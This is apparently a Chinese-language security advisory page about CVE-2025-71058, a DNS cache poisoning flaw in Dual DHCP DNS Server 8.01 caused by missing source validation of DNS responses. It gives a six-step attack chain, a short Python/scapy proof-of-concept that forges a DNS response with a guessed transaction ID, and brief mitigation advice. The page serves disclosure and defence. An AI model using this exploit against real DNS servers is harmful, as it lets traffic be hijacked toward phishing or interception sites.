CVE-2025-71058 CVSS 9.1 严重

CVE-2025-71058 Dual DHCP DNS Server缓存投毒漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-71058

漏洞类型

DNS缓存投毒

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Dual DHCP DNS Server

漏洞概述

Dual DHCP DNS Server 8.01版本存在严重的DNS缓存投毒漏洞。由于软件在处理UDP DNS响应时，未严格验证响应源是否为合法的上游DNS服务器，仅依赖TXID进行匹配。远程攻击者可利用此缺陷注入伪造的DNS响应，污染服务器缓存，将用户流量重定向至恶意站点，造成严重的安全风险。

技术细节

该漏洞的根源在于Dual DHCP DNS Server对DNS响应包的源验证机制缺失。DNS查询通常基于UDP协议，服务器发送请求后会监听响应。受影响版本在处理响应时，仅检查事务ID（TXID）是否匹配，而忽略了响应包的源IP地址和端口是否与配置的上游DNS服务器一致。攻击者可以通过网络嗅探获取TXID，或利用16位TXID空间较小的特性进行暴力猜测。一旦获取正确的TXID，攻击者即可构造伪造的DNS响应包并发送给目标服务器。由于攻击者可以控制网络时序，伪造响应往往比合法上游的响应更快到达，导致错误记录被写入缓存。成功利用该漏洞可导致域名解析被劫持，实现对受害者的网络流量监听或钓鱼攻击。

攻击链分析

STEP 1

1. 侦察

攻击者识别目标网络上运行Dual DHCP DNS Server 8.01的主机IP地址。

STEP 2

2. 嗅探与猜测

攻击者监听网络流量以捕获合法DNS请求的TXID，或针对特定域名发起大量请求并猜测TXID。

STEP 3

3. 构造恶意响应

攻击者构造恶意的DNS响应数据包，包含攻击者控制的IP地址解析，并设置正确的TXID。

STEP 4

4. 竞速注入

攻击者抢在合法的DNS服务器响应之前，向目标发送伪造的响应包。

STEP 5

5. 缓存投毒

由于缺乏源验证，目标服务器接受伪造响应并将其存入DNS缓存。

STEP 6

6. 流量劫持

当内网用户查询被投毒的域名时，服务器返回恶意IP，导致用户被重定向。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2025-71058: DNS Cache Poisoning
# This script sends a forged DNS response to poison the cache.

from scapy.all import *
import random

def send_poisoned_response(target_ip, target_port, txid, domain_to_poison, malicious_ip):
    # Construct IP layer with spoofed source (upstream DNS IP)
    # Note: In real attacks, source IP is spoofed to match legitimate upstream DNS.
    # If the target does not validate source, spoofing might not be strictly required,
    # but standard DNS poisoning implies spoofing.
    ip = IP(src="192.168.1.1", dst=target_ip) # Replace with actual upstream IP if needed
    
    # Construct UDP layer
    udp = UDP(sport=53, dport=target_port)
    
    # Construct DNS layer
    # id=txid is crucial for the server to accept the response
    # qr=1 indicates a response
    dns = DNS(
        id=txid,
        qr=1,
        qd=DNSQR(qname=domain_to_poison),
        an=DNSRR(rrname=domain_to_poison, type="A", ttl=300, rdata=malicious_ip)
    )
    
    # Send the packet
    packet = ip / udp / dns
    send(packet)
    print(f"[*] Poisoned response sent for {domain_to_poison} -> {malicious_ip}")

if __name__ == "__main__":
    # Configuration
    TARGET_DNS = "192.168.1.100" # IP of the vulnerable Dual DHCP DNS Server
    DOMAIN = "example.com"
    MALICIOUS_IP = "6.6.6.6"
    # TXID needs to be guessed or sniffed. Assuming we have it.
    TXID = random.randint(0, 65535) 
    
    send_poisoned_response(TARGET_DNS, 53, TXID, DOMAIN, MALICIOUS_IP)

影响范围

Dual DHCP DNS Server 8.01

防御指南

临时缓解措施

建议立即限制对受影响DNS服务器的网络访问，仅允许可信的客户端和上游服务器通信。在未升级前，可考虑暂时关闭该服务的DNS功能或切换至备用DNS服务器。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表